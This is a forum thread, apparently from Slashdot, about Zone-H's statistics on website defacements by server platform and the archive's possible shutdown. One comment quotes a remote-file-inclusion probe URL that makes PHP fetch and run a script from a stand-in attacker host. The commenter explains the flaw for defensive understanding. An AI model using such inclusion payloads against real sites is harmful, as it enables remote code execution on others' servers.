Breakdowns of Website Defacement by Platform

SkiifGeek writes "Zone-H have recently posted the statistical breakdown of the collected website defacements from the last few years. Surprisingly, in 2007 more Linux servers suffered a successful attack than all versions of Windows, combined. Similarly, more Apache installations were successfully attacked than all IIS versions combined. A day after posting this data, Zone-H have questioned the appropriateness of continuing to operate the archive. Despite the valuable information that can be gleaned from the service, it may soon be lost to the world. The natural successor to the now-defunct Alldas archive of defaced websites, Zone-H's archive maintains records of over 2.6 million defaced sites but may be shut down due to the continuous accusations of impropriety leveled against them any time they disclose and mirror a reported defacement."

Re:"Surprisingly"?

[call-me-kenneth]

Two factors. One, there are dozens and dozens of utterly lame hosting control panels, content management systems, messageboards and suchlike written in PHP. Secondly, IIS is far, far more secure than it was back in the bad old days. (And I speak as a fervent Apache supporter.)

Re:Demographic breakdown

[EsJay]

You don't pay extra for IIS or pirate it. It's included with Windows XP Professional and Vista (I don't know exactly which editions) as well as Windows Server.

Re:"Surprisingly"?

[0kComputer]

The author attributes this number to the fact that more people are switching from IIS to Apache. Check out the latest netcraft survey, that doesn't seem to be the case. Over the last few years, IIS seems to be hanging on at around 35-40% market share and apache around 50-60%.

Re:!Apache, but PHP

[corsec67]

Agreed on the PHP being a huge problem.
At my work, we see a bunch of attempts to exploit PHP every week, usually like this:

http://www.example.com?var=http://www.1337h4x0r/script.php

(we don't even use PHP, so this is probably coming from other hacked servers that are running php)

The "feature" they are trying to exploit there is just crazy:
If var in that case is used as a file name in a script load call, PHP will happily download the script from that website and run it instead of the local file that was expected. There are a bunch of problems with what is going on there, since having a file name in the url is just horrible, but then for the language to then take a url and download the file automatically is even worse.

From, quite approiately enough, The Daily WTF

Except that IIS is at 35% and Apache at 50%

[mverwijs]

Last I checked, IIS was at about 35% and Apache at 50%.

  --> http://news.netcraft.com/archives/2008/02/06/february_2008_web_server_survey.html

Of course, these are just statistics...

-mverwijs

Re:Yeah, yeah, yeah, wrong.

[Macthorpe]

I don't like the blame the user excuse, but that is what is being reported. Read this as: "I always deny the 'Blame the user' excuse when it's Windows, but seeing as it's Linux that has the problem here I'm willing to change my mind."

Sometimes they use a decimal point to represent 10^3 divisions and sometimes they don't use anything. I only see one instance of this (NOYB, 2006, '1308' instead of '1.308') but I'm sure you can tell us how this completely destroys their credibility.

Headings appear to duplicate each other, like the "Remote service password guessing" and "Remote service password bruteforce" You'd be right if they were the same thing, but they're not.

Finally, there are dozens of exploits "patched" each month for Windows but none of these technical problems shows up in their charts - only common problems are categorized. Is patch Tuesday a farce or are the fixes real and the problems worth tracking? It's not an exploit count, it's a log of all incidents where websites were attacked successfully. I'll let you go and find an exploit count for IIS 6.0 and Apache 2.2 yourself (I'll give you a hint though, you won't like the numbers).